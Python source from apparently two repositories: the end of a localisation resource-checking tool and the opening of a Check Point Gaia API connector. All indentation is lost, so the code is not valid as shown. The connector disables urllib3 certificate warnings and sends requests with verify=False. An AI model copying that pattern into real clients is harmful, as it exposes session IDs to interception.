placeholder_pattern = PY.originalTextFor(PY.Combine(PY.Literal("%") + PY.Optional(index) + PY.Optional(flags) + PY.Optional(width) + PY.Optional(precision) + PY.Optional(length_modifier) + conversion_specifier))
return placeholder_pattern
class JsResFile(BaseResFile):
def get_language(self):
base_name = os.path.basename(self.directory).lower()
if base_name == "root":
return BASE_LANGUAGE
elif base_name in STANDARDIZED_LANGUAGES.keys():
return STANDARDIZED_LANGUAGES[base_name]
else:
LOG.critical("'{language}' is not pre-defined in {application}, please contact tool author".format(language = base_name, application = __application__))
quit_application(-1)
def get_group_id(self):
return self.file, os.path.dirname(self.directory)
def parse(self, parsing_patterns = None):
data = self.read()
if not data:
LOG.warning("There is no data in file '{path}'".format(path = self.path))
return
try:
key_pattern = (PY.Word(string.ascii_uppercase, string.ascii_uppercase + PY.nums + "_") + PY.ZeroOrMore(PY.Literal("_") + PY.Word(string.ascii_uppercase, string.ascii_uppercase + PY.nums + "_"))).setParseAction(lambda t: "".join(t))
value_pattern = PY.SkipTo((PY.Literal(",") | PY.Literal("\r\n") | PY.Literal("}")), include = False, ignore = PY.quotedString|PY.cppStyleComment).setParseAction(lambda t: t[0].rstrip("\r\n").rstrip(",").strip(" \t"))
comment = PY.cppStyleComment
key_value_pattern = (key_pattern | (PY.Literal("\"").suppress() + key_pattern + PY.Literal("\"").suppress()) | (PY.Literal("'").suppress() + key_pattern + PY.Literal("'").suppress())) + PY.Literal(":").suppress() + value_pattern
escape_pattern = re.compile("'.*(?<!\\\)'.*'|\".*(?<!\\\)\".*\"")
for tokens, start, end in key_value_pattern.ignore(comment).scanString(data):
key = tokens[0]
value = tokens[1]
pure_value = value[1:-1]
if key in self.keys:
self.duplicate_keys.append(key)
if escape_pattern.match(value):
if not "+" in value:
self.escape_error_keys.append(key)
else:
for sub_string in value.split("+"):
if escape_pattern.match(sub_string.strip(" \t")):
self.escape_error_keys.append(key)
self.keys.add(key)
self.values.append(pure_value)
self.key_value_pairs[key] = pure_value
self.item_count += 1
except Exception as e:
LOG.error("An error occurred when parsing key-value pairs from file '{path}': {exception}".format(path = self.path, exception = e))
self.reset_value_containers()
return
class JsResDetector(BaseResDetector):
def get_placeholder_pattern(self):
return PY.Combine(PY.Literal("#").suppress() + PY.Word(PY.alphanums, PY.alphanums + "-") + PY.Literal("#").suppress())
def get_res_keys_and_src_keys(self):
res_keys = set()
for res_file_group in self.res_file_groups:
if res_file_group.base_res_file:
res_keys = res_keys | res_file_group.base_res_file.keys
src_keys = set()
src_key_info = []
res_folder_pattern = os.sep + "nls" + os.sep
for root, dirs, files in os.walk(self.src_dir):
if not res_folder_pattern in (root + os.sep):
for file in files:
for extension in ["js", "htm", "html"]:
if file.endswith(extension):
src_file = BaseSrcFile(root, file, extension)
for key, start, end in src_file.get_resource_keys():
src_keys.add(key)
src_key_info.append((key, src_file, start, end))
return res_keys, src_keys, src_key_info
def detect_unused_and_undefined_keys(self):
detect_unused_key = True if IssueName.unused_key.value in self.detect_issues else False
detect_improper_used_key = True if IssueName.improperly_used_key.value in self.detect_issues else False
if detect_unused_key:
LOG.info("Detecting unused keys in resource files, which may take some time...")
res_keys, src_keys, src_key_info = self.get_res_keys_and_src_keys()
elif detect_improper_used_key:
LOG.info("Detecting undefined resource keys in source code, which may take some time...")
res_keys, src_keys, src_key_info = self.get_res_keys_and_src_keys()
else:
return
if detect_unused_key:
for res_file_group in self.res_file_groups:
base_res_file = res_file_group.base_res_file
if not base_res_file:
continue
missing_keys = base_res_file.keys - src_keys
for missing_key in sorted(missing_keys):
issue = Issue(file = base_res_file.path, line = 0, column_begin = 0, column_begin_offset = 0, column_end = 0, code = IssueCode.unused_key, description = Description.unused_key, severity = Severity.warning, context = Context.unused_key.value.format(missing_key))
self.issues.add(issue)
if detect_improper_used_key:
if detect_unused_key:
LOG.info("Detecting undefined resource keys in source code...")
for key, src_file, start, end in src_key_info:
if not key in res_keys:
column_begin, column_begin_offset = src_file.get_column_number_with_offset(start)
issue = Issue(file = src_file.path, line = src_file.get_line_number(start), column_begin = column_begin, column_begin_offset = column_begin_offset, column_end = src_file.get_column_number(end), code = IssueCode.improperly_used_key, description = Description.improperly_used_key, severity = Severity.error, context = Context.improperly_used_key.value.format(src_file.get_line(start).strip("\r")))
self.issues.add(issue)
class JsonResFile(BaseResFile):
def parse(self, parsing_patterns = None):
data = self.read()
if not data:
LOG.warning("There is no data in file '{path}'".format(path = self.path))
return
def flat_dict(prefix, json_dict):
for key, value in json_dict.items():
key = key if not prefix else prefix + "." + key
if type(value) == str:
yield key, value
elif type(value) == dict:
for sub_key, sub_value in flat_dict(key, value):
yield sub_key, sub_value
else:
LOG.warning("Non-dict/str type found when getting key-value pairs from json file '{path}'".format(path = self.path))
try:
for key, value in flat_dict("", json.loads(data)):
if key in self.keys:
self.duplicate_keys.append(key)
self.keys.add(key)
self.values.append(value)
self.key_value_pairs[key] = value
self.item_count += 1
except Exception as e:
LOG.error("An error occurred when parsing key-value pairs from file '{path}': {exception}".format(path = self.path, exception = e))
self.reset_value_containers()
return
class JsonResDetector(BaseResDetector):
def get_placeholder_pattern(self):
return PY.Literal("{").suppress() + PY.Word(PY.nums) + PY.Literal("}").suppress()
class BaseSrcFile:
def __init__(self, directory, file, extension):
self.directory = directory
self.file = file
self.extension = extension
self.path = os.path.join(directory, file)
self.code = self.read()
def read(self):
try:
f = open(self.path, "rb")
bin_data = f.read()
f.close()
except Exception as e:
LOG.error("Cannot open file '{path}' to read: {exception}".format(path = self.path, exception = e))
return None
for bom, encoding in {codecs.BOM_UTF8 : "utf_8", codecs.BOM_UTF16_BE : "utf_16_be", codecs.BOM_UTF16_LE : "utf_16_le", codecs.BOM_UTF32_BE : "utf_32_be", codecs.BOM_UTF32_LE : "utf_32_le"}.items():
if bin_data.startswith(bom):
try:
return bin_data[len(bom):].decode(encoding)
except UnicodeDecodeError:
LOG.error("Cannot read file '{path}', the real encoding is not the same as {encoding} encoding detected by BOM".format(path = self.path, encoding = encoding))
return None
try:
return bin_data.decode("utf_8")
except UnicodeDecodeError:
pass
try:
return bin_data.decode("cp1252")
except UnicodeDecodeError:
pass
try:
return bin_data.decode(locale.getpreferredencoding())
except UnicodeDecodeError:
LOG.error("Cannot read file '{path}', encoding is unknown".format(path = self.path))
return None
def get_line_number(self, location):
return self.code.count("\n", 0, location) + 1
def get_column_number(self, location):
try:
if self.code[location] == "\n":
return 1
else:
return location - self.code.rfind("\n", 0, location)
except IndexError:
return 0
def get_column_number_with_offset(self, location):
try:
if self.code[location] == "\n":
return 1, 0
else:
column_start = self.code.rfind("\n", 0, location)
return location - column_start, self.code.count("\t", column_start + 1, location) * (TAB_WIDTH - 1)
except IndexError:
return 0, 0
def get_code_snippet(self, start, end):
return self.code[start:end]
def get_line(self, location):
last_new_line = self.code.rfind("\n", 0, location)
next_new_line = self.code.find("\n", location)
if next_new_line >= 0:
return self.code[(last_new_line + 1):next_new_line]
else:
return self.code[(last_new_line + 1):]
def get_resource_keys(self):
if not self.code:
return None
target = None
if self.extension == "js":
#resource_key = (((PY.Literal("Locale") + PY.Optional(PY.Word(PY.alphas))) | PY.Literal("html")) + PY.Literal(".")).suppress() + (PY.Word(string.ascii_uppercase, string.ascii_uppercase + PY.nums + "_") + PY.ZeroOrMore(PY.Literal("_") + PY.Word(string.ascii_uppercase, string.ascii_uppercase + PY.nums + "_"))).setParseAction(lambda t: "".join(t)) + PY.NotAny(PY.Word(PY.alphanums + "_")).suppress()
resource_key = ((PY.CaselessLiteral("locale") + PY.Optional(PY.Word(PY.alphanums + "_")) + PY.Literal(".") + PY.Optional(PY.Word(PY.alphas) + PY.Literal("."))) | (PY.Literal("html") + PY.Literal("."))).suppress() + (PY.Word(string.ascii_uppercase, string.ascii_uppercase + PY.nums + "_") + PY.ZeroOrMore(PY.Literal("_") + PY.Word(string.ascii_uppercase, string.ascii_uppercase + PY.nums + "_"))).setParseAction(lambda t: "".join(t)) + PY.NotAny(PY.Word(PY.alphanums + "_")).suppress()
#resource_key = ((PY.Literal("getLocalizationData()") + PY.Literal(".") + PY.Word(PY.alphas)) | (PY.Word(PY.alphas) + PY.Literal(".") + PY.Optional(PY.Word(PY.alphas) + PY.Literal(".")))).suppress() + (PY.Word(string.ascii_uppercase, string.ascii_uppercase + PY.nums + "_") + PY.ZeroOrMore(PY.Literal("_") + PY.Word(string.ascii_uppercase, string.ascii_uppercase + PY.nums + "_"))).setParseAction(lambda t: "".join(t)) + PY.NotAny(PY.Word(PY.alphanums + "_")).suppress()
comment = PY.cppStyleComment
string_parser = PY.quotedString
target = resource_key.ignore(comment | string_parser).parseWithTabs()
elif self.extension == "htm" or self.extension == "html":
resource_key = (PY.Literal("{") *(2, 3)).suppress() + (PY.Literal("Locale.") | PY.Literal("html.") | PY.Literal("locale.html.")).suppress() + (PY.Word(string.ascii_uppercase, string.ascii_uppercase + PY.nums + "_") + PY.ZeroOrMore(PY.Literal("_") + PY.Word(string.ascii_uppercase, string.ascii_uppercase + PY.nums + "_"))).setParseAction(lambda t: "".join(t)) + (PY.Literal("}") *(2, 3)).suppress()
#resource_key = (PY.Word(PY.alphanums + "_") + PY.Literal(".")).suppress() + (PY.Word(string.ascii_uppercase, string.ascii_uppercase + PY.nums + "_") + PY.ZeroOrMore(PY.Literal("_") + PY.Word(string.ascii_uppercase, string.ascii_uppercase + PY.nums + "_"))).setParseAction(lambda t: "".join(t))
comment = PY.htmlComment
target = resource_key.ignore(comment).parseWithTabs()
else:
pass
#target = PY.NoMatch
for tokens, start, end in target.scanString(self.code):
yield tokens[0], start, end
class Configuration:
def __init__(self, dir_input):
self.config_module_dir = dir_input
self.config_file_name = "resource_detector_config.py"
self.config_module_name = "resource_detector_config"
self.config_file_path = os.path.join(self.config_module_dir, self.config_file_name)
self.config_module = self.get_config_module()
self.use_user_config = True if self.config_module else False
self.support_res_exts = ["resx", "resw", "rc", "rc2", "mc", "wxl", "strings", "xml", "js", "properties", "po", "tok", "xib", "json"]
self.support_res_types = ["resx", "resw", "rc", "rc2", "mc", "wxl", "strings", "xml", "js", "properties", "po", "tok", "xib", "json"]
self.detector_switch_attrs = \
{
"resx" : "USE_RESX_DETECTOR",
"resw" : "USE_RESW_DETECTOR",
"rc" : "USE_RC_DETECTOR",
"rc2" : "USE_RC2_DETECTOR",
"mc" : "USE_MC_DETECTOR",
"wxl" : "USE_WXL_DETECTOR",
"strings" : "USE_STR_DETECTOR",
"xml" : "USE_XML_DETECTOR",
"js" : "USE_JS_DETECTOR",
"properties" : "USE_PRO_DETECTOR",
"po" : "USE_PO_DETECTOR",
"tok" : "USE_TOK_DETECTOR",
"xib" : "USE_XIB_DETECTOR",
"json" : "USE_JSON_DETECTOR",
}
self.detect_issues_attrs = \
{
"resx" : "RESX_DETECT_ISSUES",
"resw" : "RESW_DETECT_ISSUES",
"rc" : "RC_DETECT_ISSUES",
"rc2" : "RC2_DETECT_ISSUES",
"mc" : "MC_DETECT_ISSUES",
"wxl" : "WXL_DETECT_ISSUES",
"strings" : "STR_DETECT_ISSUES",
"xml" : "XML_DETECT_ISSUES",
"js" : "JS_DETECT_ISSUES",
"properties" : "PRO_DETECT_ISSUES",
"po" : "PO_DETECT_ISSUES",
"tok" : "TOK_DETECT_ISSUES",
"xib" : "XIB_DETECT_ISSUES",
"json" : "JSON_DETECT_ISSUES",
}
self.fixed_res_groups_attrs = \
{
"resx" : "USE_FIXED_RESX_RES_FILE_GROUPS",
"resw" : "USE_FIXED_RESW_RES_FILE_GROUPS",
"rc" : "USE_FIXED_RC_RES_FILE_GROUPS",
"rc2" : "USE_FIXED_RC2_RES_FILE_GROUPS",
"mc" : "USE_FIXED_MC_RES_FILE_GROUPS",
"wxl" : "USE_FIXED_WXL_RES_FILE_GROUPS",
"strings" : "USE_FIXED_STR_RES_FILE_GROUPS",
"xml" : "USE_FIXED_XML_RES_FILE_GROUPS",
"js" : "USE_FIXED_JS_RES_FILE_GROUPS",
"properties" : "USE_FIXED_PRO_RES_FILE_GROUPS",
"po" : "USE_FIXED_PO_RES_FILE_GROUPS",
"tok" : "USE_FIXED_TOK_RES_FILE_GROUPS",
"xib" : "USE_FIXED_XIB_RES_FILE_GROUPS",
"json" : "USE_FIXED_JSON_RES_FILE_GROUPS",
}
self.res_groups_attrs = \
{
"resx" : "RESX_RES_FILE_GROUPS",
"resw" : "RESW_RES_FILE_GROUPS",
"rc" : "RC_RES_FILE_GROUPS",
"rc2" : "RC2_RES_FILE_GROUPS",
"mc" : "MC_RES_FILE_GROUPS",
"wxl" : "WXL_RES_FILE_GROUPS",
"strings" : "STR_RES_FILE_GROUPS",
"xml" : "XML_RES_FILE_GROUPS",
"js" : "JS_RES_FILE_GROUPS",
"properties" : "PRO_RES_FILE_GROUPS",
"po" : "PO_RES_FILE_GROUPS",
"tok" : "TOK_RES_FILE_GROUPS",
"xib" : "XIB_RES_FILE_GROUPS",
"json" : "JSON_RES_FILE_GROUPS",
}
self.detect_languages_attrs = \
{
"resx" : "RESX_DETECT_LANGUAGES",
"resw" : "RESW_DETECT_LANGUAGES",
"rc" : "RC_DETECT_LANGUAGES",
"rc2" : "RC2_DETECT_LANGUAGES",
"mc" : "MC_DETECT_LANGUAGES",
"wxl" : "WXL_DETECT_LANGUAGES",
"strings" : "STR_DETECT_LANGUAGES",
"xml" : "XML_DETECT_LANGUAGES",
"js" : "JS_DETECT_LANGUAGES",
"properties" : "PRO_DETECT_LANGUAGES",
"po" : "PO_DETECT_LANGUAGES",
"tok" : "TOK_DETECT_LANGUAGES",
"xib" : "XIB_DETECT_LANGUAGES",
"json" : "JSON_DETECT_LANGUAGES",
}
self.detector_classes = \
{
"resx" : ResxResDetector,
"resw" : ReswResDetector,
"rc" : RcResDetector,
"rc2" : Rc2ResDetector,
"mc" : McResDetector,
"wxl" : WxlResDetector,
"strings" : StrResDetector,
"xml" : XmlResDetector,
"js" : JsResDetector,
"properties" : ProResDetector,
"po" : PoResDetector,
"tok" : TokResDetector,
"xib" : XibResDetector,
"json" : JsonResDetector,
}
self.res_file_classes = \
{
"resx" : ResxResFile,
"resw" : ReswResFile,
"rc" : RcResFile,
"rc2" : Rc2ResFile,
"mc" : McResFile,
"wxl" : WxlResFile,
"strings" : StrResFile,
"xml" : XmlResFile,
"js" : JsResFile,
"properties" : ProResFile,
"po" : PoResFile,
"tok" : TokResFile,
"xib" : XibResFile,
"json" : JsonResFile,
}
self.default_detect_issues = {issue_name.value for issue_name in IssueName if issue_name != IssueName.untranslated_value}
self.ignore_issues_attr = "IGNORE_ISSUES"
def get_config_module(self):
if not os.path.isfile(self.config_file_path):
return None
if not self.config_module_dir in sys.path:
sys.path.insert(0, self.config_module_dir)
if not self.config_module_name in sys.modules:
try:
config = importlib.__import__(self.config_module_name)
del sys.path[0]
return config
except ImportError as ie:
del sys.path[0]
LOG.critical("Cannot import configuration file: {import_error}".format(import_error = ie))
quit_application(-1)
except Exception as e:
del sys.path[0]
LOG.critical("Cannot import configuration file: {exception}".format(exception = e))
quit_application(-1)
class ResourceDetector:
def __init__(self, arguments):
self.args = arguments
self.src_dir = self.get_absolute_path(arguments.directory)
self.res_files = {}
self.res_file_count = 0
self.issues = Issues()
self.begin_time = datetime.utcnow()
self.end_time = datetime.utcnow()
self.file_count = 0
self.item_count = 0
self.config = Configuration(self.src_dir)
def get_absolute_path(self, dir_input):
scan_dir = os.path.abspath(dir_input)
if not os.path.isdir(scan_dir):
LOG.critical("The input scan directory '{directory}' is not valid, please have a check".format(directory = scan_dir))
quit_application(-1)
return scan_dir
def run(self):
if self.args.generate_config:
self.write_configuration()
else:
self.detect()
self.filter_issues()
self.end_time = datetime.utcnow()
self.display_summary_result()
self.write_result_for_user()
self.write_result_for_ignoring()
self.write_result_for_platform()
def get_resource_files(self):
LOG.info("Filtering resource files in '{directory}'...".format(directory = self.src_dir))
for res_type in self.config.support_res_types:
self.res_files[res_type] = []
res_file_count = 0
for root, dirs, files in os.walk(self.src_dir):
for file in files:
self.file_count += 1
for ext in self.config.support_res_exts:
if file.endswith("." + ext):
if ext == "xml":
if "values" in os.path.basename(root):
self.res_files[ext].append(self.config.res_file_classes[ext](root, file, ext))
else:
continue
elif ext == "js":
if os.path.dirname(root).endswith("nls"):
self.res_files[ext].append(self.config.res_file_classes[ext](root, file, ext))
else:
continue
elif ext == "json":
if ("locales" == os.path.basename(root)) or ("_locales" in root.lower().split(os.sep)):
self.res_files[ext].append(self.config.res_file_classes[ext](root, file, ext))
else:
continue
else:
self.res_files[ext].append(self.config.res_file_classes[ext](root, file, ext))
res_file_count += 1
LOG.info("Filtered {0} resource files from {1} files".format(res_file_count, self.file_count))
def detect(self):
LOG.info("Start running {application} to scan '{src_dir}'".format(application = __application__, src_dir = self.src_dir))
if self.config.use_user_config:
self.get_resource_files()
LOG.info("Configuration file '{config_file}' exists, start detecting with this configuration file".format(config_file = self.config.config_file_path))
LOG.info("---------------------------------------------------------------------------------------------------------------------------------------")
for res_type in self.config.support_res_types:
res_files = self.res_files.get(res_type)
if not res_files:
continue
try:
detector_switch = getattr(self.config.config_module, self.config.detector_switch_attrs[res_type])
if detector_switch == True:
try:
LOG.info("Start running {res_type} {application} with configuration".format(res_type = res_type, application = __application__))
res_detector = self.config.detector_classes[res_type](self.src_dir, res_files, self.config, res_type)
res_detector.detect()
self.issues.extend(res_detector.issues)
self.item_count += res_detector.item_count
self.res_file_count += res_detector.res_file_count
LOG.info("---------------------------------------------------------------------------------------------------------------------------------------")
except Exception as e:
LOG.critical("An error occurred when running {res_type} {application}: {exception}".format(res_type = res_type, application = __application__, exception = e))
LOG.info("---------------------------------------------------------------------------------------------------------------------------------------")
quit_application(-1)
except AttributeError:
pass
else:
self.get_resource_files()
LOG.info("---------------------------------------------------------------------------------------------------------------------------------------")
for res_type in self.config.support_res_types:
res_files = self.res_files.get(res_type)
if res_files:
try:
LOG.info("Start running {res_type} {application}".format(res_type = res_type, application = __application__))
res_detector = self.config.detector_classes[res_type](self.src_dir, res_files, self.config, res_type)
res_detector.detect()
self.issues.extend(res_detector.issues)
self.item_count += res_detector.item_count
self.res_file_count += res_detector.res_file_count
LOG.info("---------------------------------------------------------------------------------------------------------------------------------------")
except Exception as e:
LOG.critical("An error occurred when running {res_type} {application}: {exception}".format(res_type = res_type, application = __application__, exception = e))
LOG.info("---------------------------------------------------------------------------------------------------------------------------------------")
quit_application(-1)
def write_configuration(self):
LOG.info("Start generating a new configuration file: '{config_file}'".format(config_file = self.config.config_file_path))
try:
output_file = open(file = self.config.config_file_path, mode = "w", encoding = "utf_8_sig")
except Exception as e:
LOG.critical("Cannot open '{config_file}' to write configuration content: {exception}".format(config_file = self.config.config_file_path, exception = e))
quit_application(-1)
self.get_resource_files()
LOG.info("---------------------------------------------------------------------------------------------------------------------------------------")
try:
output_file.write("# !/usr/bin/env python\n# -*- coding: utf-8 -*-\n")
output_file.write("# configuration file generated time(utc): {time_now}\n\n\n".format(time_now = datetime.utcnow()))
output_file.close()
except Exception as e:
LOG.critical("An error occurred when writing configuration to '{config_file}': {exception}".format(config_file = self.config.config_file_path, exception = e))
quit_application(-1)
for res_type in self.config.support_res_types:
res_files = self.res_files.get(res_type)
if res_files:
try:
LOG.info("Start writing configuration related to {res_type} files".format(res_type = res_type))
res_detector = self.config.detector_classes[res_type](self.src_dir, res_files, self.config, res_type)
res_detector.write_configuration()
LOG.info("---------------------------------------------------------------------------------------------------------------------------------------")
except Exception as e:
LOG.critical("An error occurred when writing configuration related to {ext} files: {exception}".format(ext = res_type, exception = e))
LOG.info("---------------------------------------------------------------------------------------------------------------------------------------")
quit_application(-1)
try:
output_file = open(file = self.config.config_file_path, mode = "a", encoding = "utf_8_sig")
output_file.write("#Copy the issues you want to ignore from detection result to the set, each issue item should be like the example below: R'''issue''',\n")
output_file.write("#You can also use -i option to generate the ignore issue patterns which can be directly copied and used here\n")
output_file.write("{ignore_issues_attr} =\\\n".format(ignore_issues_attr = self.config.ignore_issues_attr) + "{\n")
output_file.write("#R'''{issue_string}''',\n".format(issue_string = R"D:\Code\TestCode\StudioArthur\Installers\Console\LocalizedResources\zh-cn.wxl, 0, 0, unmatched placeholder(s) in localized resource file, error, key=WelcomeEulaDlg_Title, value=[ProductName] 安装程序"))
output_file.write("}")
output_file.close()
except Exception as e:
LOG.critical("Cannot open '{config_file}' to write configuration content: {exception}".format(config_file = self.config.config_file_path, exception = e))
quit_application(-1)
LOG.info("Configuration file '{config_file}' has been generated, customize it and run {application} again".format(config_file = self.config.config_file_path, application = __application__))
def filter_issues(self):
if not self.config.use_user_config:
return
ignore_issues = getattr(self.config.config_module, self.config.ignore_issues_attr, set())
if not ignore_issues:
return
LOG.info("Filtering detected issues...")
LOG.info("---------------------------------------------------------------------------------------------------------------------------------------")
remaining_issues = Issues()
for issue in self.issues.get_issues():
issue_for_user = "{file}, {line_begin}, {column_begin}, {description}, {severity}, {context}".format(file = issue.file, line_begin = issue.line, column_begin = issue.column_begin + issue.column_begin_offset, description = issue.description.value, severity = issue.severity.value, context = issue.context.replace("\u2308", "").replace("\u2309", "").strip())
if not issue_for_user in ignore_issues:
remaining_issues.add(issue)
else:
ignore_issues.remove(issue_for_user)
self.issues = remaining_issues
def display_summary_result(self):
LOG.info("Detection result summary:")
LOG.info("Start time: {start_time}".format(start_time = self.begin_time.replace(tzinfo = timezone.utc).astimezone()))
LOG.info("End time: {end_time}".format(end_time = self.end_time.replace(tzinfo = timezone.utc).astimezone()))
LOG.info("Time cost(hh:mm:ss): {duration}".format(duration = self.end_time - self.begin_time))
LOG.info("File(s) scanned: {file_count}".format(file_count = self.res_file_count))
LOG.info("Item(s) scanned: {item_count}".format(item_count = self.item_count))
LOG.info("Issue(s) detected: {issue_count}".format(issue_count = self.issues.issue_count))
LOG.info("Error(s) detected: {error_count}".format(error_count = self.issues.error_count))
LOG.info("Warning(s) detected: {warning_count}".format(warning_count = self.issues.warning_count))
LOG.info("---------------------------------------------------------------------------------------------------------------------------------------")
def write_result_for_platform(self):
try:
if self.args.summary:
LOG.info("Writing summary detection result for platform...")
summary_file = self.args.summary
if not summary_file.endswith(".csv"):
summary_file = summary_file + ".csv"
with open(summary_file, "w", encoding = "utf_8_sig", newline = "") as fw:
summary_writer = csv.writer(fw)
summary_writer.writerow(["files", "errors", "warnings", "items", "begin", "end", "name", "version"])
summary_writer.writerow([self.res_file_count, self.issues.error_count, self.issues.warning_count, self.item_count, self.begin_time, self.end_time, __application__, __version__])
#LOG.info("---------------------------------------------------------------------------------------------------------------------------------------")
if self.args.details:
LOG.info("Writing detailed detection result for platform...")
details_file = self.args.details
if not details_file.endswith(".csv"):
details_file = details_file + ".csv"
with open(details_file, "w", encoding = "utf_8_sig", newline = "") as fw:
details_writer = csv.writer(fw)
details_writer.writerow(["file", "line", "column", "columnEnd", "severity", "code", "context"])
for issue in self.issues.get_issues():
details_writer.writerow([os.path.relpath(issue.file, self.src_dir).replace("\\", "/"), issue.line, issue.column_begin, issue.column_end, issue.severity.value, issue.code.value, issue.context])
#LOG.info("---------------------------------------------------------------------------------------------------------------------------------------")
except Exception as e:
LOG.critical("An error occurred when writing detection result for platform: {exception}".format(exception = e))
quit_application(-1)
def write_result_for_user(self):
if self.args.output:
try:
LOG.info("Writing detection result...")
output_file = open(file = self.args.output, mode = "w", encoding = "utf_8_sig")
output_file.write("Detection result summary:\n")
output_file.write("Tool name: {tool_name}\n".format(tool_name = __application__))
output_file.write("Tool version: {tool_version}\n".format(tool_version = __version__))
output_file.write("Source directory: {src_dir}\n".format(src_dir = self.src_dir))
output_file.write("Start time: {start_time}\n".format(start_time = self.begin_time.replace(tzinfo = timezone.utc).astimezone()))
output_file.write("End time: {end_time}\n".format(end_time = self.end_time.replace(tzinfo=timezone.utc).astimezone()))
output_file.write("Time cost(hh:mm:ss): {duration}\n".format(duration = self.end_time - self.begin_time))
output_file.write("File(s) scanned: {file_count}\n".format(file_count = self.res_file_count))
output_file.write("Item(s) scanned: {item_count}\n".format(item_count = self.item_count))
output_file.write("Issue(s) detected: {issue_count}\n".format(issue_count = self.issues.issue_count))
output_file.write("Error(s) detected: {error_count}\n".format(error_count = self.issues.error_count))
output_file.write("Warning(s) detected: {warning_count}\n".format(warning_count = self.issues.warning_count))
output_file.write("---------------------------------------------------------------------------------------------------------------------------------------------------------\n")
output_file.write("File, Line, Column, Issue, Severity, Context\n")
for issue in self.issues.get_issues():
output_file.write("{file}, {line_begin}, {column_begin}, {description}, {severity}, {context}\n".format(file = issue.file, line_begin = issue.line, column_begin = issue.column_begin + issue.column_begin_offset, description = issue.description.value, severity = issue.severity.value, context = issue.context.replace("\u2308", "").replace("\u2309", "").strip()))
output_file.close()
#LOG.info("---------------------------------------------------------------------------------------------------------------------------------------")
except Exception as e:
LOG.critical("An error occurred when writing detection result to '{output_file}': {exception}".format(output_file = self.args.output, exception = e))
quit_application(-1)
def write_result_for_ignoring(self):
if self.args.ignore_pattern:
try:
LOG.info("Writing ignore issue patterns...")
output_file = open(file = self.args.ignore_pattern, mode = "w", encoding = "utf_8_sig")
for issue in self.issues.get_issues():
issue_pattern = "{file}, {line_begin}, {column_begin}, {description}, {severity}, {context}".format(file = issue.file, line_begin = issue.line, column_begin = issue.column_begin + issue.column_begin_offset, description = issue.description.value, severity = issue.severity.value, context = issue.context.replace("\u2308", "").replace("\u2309", "").strip())
output_file.write(repr(issue_pattern) + ",\n")
output_file.close()
#LOG.info("---------------------------------------------------------------------------------------------------------------------------------------")
except Exception as e:
LOG.critical("An error occurred when writing ignore issue patterns to '{output_file}': {exception}".format(output_file = self.args.ignore_pattern, exception = e))
quit_application(-1)
def initialize(arguments):
try:
global LOG
LOG = logging.getLogger(__name__)
LOG.setLevel(logging.INFO)
formatter = logging.Formatter("[%(levelname)s]: %(message)s")
if arguments.log:
file_handler = logging.FileHandler(filename = arguments.log, mode = 'w', encoding = "utf_8_sig", delay = False)
file_handler.setFormatter(formatter)
LOG.addHandler(file_handler)
stream_handler = logging.StreamHandler(stream = sys.stdout)
stream_handler.setFormatter(formatter)
LOG.addHandler(stream_handler)
except Exception as e:
print("[CRITICAL]: An error occurred when initializing logging: {exception}".format(exception = e))
print("[INFO]: {application} exited abnormally".format(application = __application__))
sys.exit(-1)
if arguments.tab:
if arguments.tab.isdigit():
try:
global TAB_WIDTH
TAB_WIDTH = int(arguments.tab)
except ValueError:
LOG.critical("Argument 'tab' is not valid, please have a check")
quit_application(-1)
else:
LOG.critical("Argument 'tab' is not valid, please have a check")
quit_application(-1)
def quit_application(state):
if state == -1:
LOG.info("{application} exited abnormally".format(application = __application__))
else:
LOG.info("{application} exited normally".format(application = __application__))
sys.exit(state)
def parse_arguments(arguments):
arg_parser = argparse.ArgumentParser(description = "resource detector: detect g11n/i18n issues in resource files")
arg_parser.add_argument("directory", help = "specify the source code directory to be scanned")
arg_parser.add_argument("-o", "--output", metavar = "result.txt", help = "specify the output file where detection result will be written")
arg_parser.add_argument("-g", "--generate_config", action = "store_true", help = "generate configuration file named 'resource_detector_config.py' in the directory to be scanned")
arg_parser.add_argument("-l", "--log", metavar = "log.txt", help = "specify the log file")
arg_parser.add_argument("-t", "--tab", metavar = "4", help = "specify the tab width to make sure the column number is correctly calculated, default value is 4")
arg_parser.add_argument("-i", "--ignore_pattern", metavar = "ignore_patterns.txt", help = "specify the file where ignore issue patterns will be written")
arg_parser.add_argument("-s", "--summary", metavar = "summary.csv", help = "specify the csv file where summary detection result will be written")
arg_parser.add_argument("-d", "--details", metavar = "details.csv", help = "specify the csv file where detailed detection result will be written")
arg_parser.add_argument("-v", "--version", action = "version", version = __version__)
return arg_parser.parse_args(arguments)
def main(argv):
arguments = parse_arguments(argv[1:])
initialize(arguments)
resource_detector = ResourceDetector(arguments)
resource_detector.run()
return 0
if __name__ == "__main__":
result = main(sys.argv)
quit_application(result)
``` |
{
"source": "0dadj1an/Check_Point_Gaia_API_config_generator",
"score": 2
} |
#### File: 0dadj1an/Check_Point_Gaia_API_config_generator/gaia_api_connector.py
```python
__author__ = "<NAME>"
__credits__ = ["ivosh", "laura"]
__version__ = "1.0"
__maintainer__ = "<NAME>"
__email__ = "<EMAIL>"
__status__ = "production"
__dev_version__ = "v1"
__spec__= "GaiaAPI connector"
import requests
import urllib3
import json
import sys
import time
import getpass
import logging
import os
import base64
import ipaddress
import signal
import argparse
from datetime import datetime
######## Class############
class DoLogging():
"""
Logging class, to have some possibility debug code in the future
"""
def __init__(self) -> None:
"""
Constructor does not do anything
"""
pass
def do_logging(self:object, msg:str) -> None:
"""
Log appropriate message into log file
"""
# if needed change to DEBUG for more data
current_path=(os.path.dirname(os.path.abspath(__file__)))
log='{0}/gaia_api_connector.elg'.format(current_path)
logging.basicConfig(filename=log, level=logging.DEBUG)
msgq = 'TIME:{}:{}'.format(str(datetime.now()),msg)
requests_log = logging.getLogger("requests.packages.urllib3")
requests_log.setLevel(logging.DEBUG)
requests_log.propagate = True
logging.info(msgq)
logging.info(requests_log)
######## Class############
class Connector():
"""
Connector class is main class handling connectivity to CP API
"""
# do not care about ssl cert validation for now
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
@classmethod
def task_method(cls, sid:str, url:str, task:str) -> dict:
"""
this is help method which is checking task status when publish is needed
"""
payload_list={}
payload_list['task-id']=task
headers = {
'content-type': "application/json",
'Accept': "*/*",
'x-chkp-sid': sid,
}
response = requests.post(url+"show-task", json=payload_list, headers=headers, verify=False)
return response
def __init__(self, url:str, payload:dict) -> dict:
"""
This is constructor for class, login to API server is handled here - handling also conectivity problems to API
"""
self.sid=""
# default header without SID
self.headers_default = {
'content-type': "application/json",
'Accept': "*/*",
}
# headers for usage in instance methods - with self.SID - will be filled up in constructor
